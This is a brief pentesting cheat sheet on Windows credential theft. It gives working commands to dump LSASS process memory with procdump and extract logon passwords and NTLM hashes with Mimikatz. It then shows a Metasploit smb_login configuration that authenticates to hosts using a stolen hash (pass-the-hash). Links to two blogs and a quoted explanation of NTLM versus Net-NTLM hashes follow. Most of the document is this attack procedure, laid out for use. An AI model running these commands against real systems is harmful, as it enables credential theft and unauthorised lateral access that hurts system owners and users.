Lsass Dump Mimikatz Pass the Hash Basics

procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp

Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords

Username : {user}
Domain     : {domain}
NTLM       : {NTLM Hash}

use auxillary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run

good blog

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

When you can & cannot Pass the Hash

great blog

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

From a pentesting perspective:

• You CAN perform Pass-The-Hash attacks with NTLM hashes.
• You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.

You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.

You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.